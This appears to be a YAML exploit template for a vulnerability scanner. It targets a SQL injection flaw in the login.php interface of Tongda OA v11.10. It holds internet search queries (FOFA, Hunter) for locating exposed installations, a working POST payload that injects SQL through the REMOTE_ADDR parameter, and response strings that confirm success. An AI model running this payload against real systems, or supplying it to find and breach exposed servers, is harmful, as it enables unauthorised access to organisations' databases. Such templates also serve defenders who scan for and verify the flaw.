product: 通达OA
vName: 通达OA v11.10 login.php接口存在SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 通达OAV11.10接口 /ispirit/interface/login.php  存在SQL注入漏洞。
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: https://wiki.wy876.cn/#/./通达OA/通达OAV11.10接口login.php存在SQL注入漏洞
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /ispirit/interface/login.php
      data: name=123&pass=123&_SERVER[REMOTE_ADDR]=1','10',(select+@`,'`+or+if(1% 3d0,1,(select+~0%2b1))+limit+0,1))--+
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - XPATH syntax error
            logic: and
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and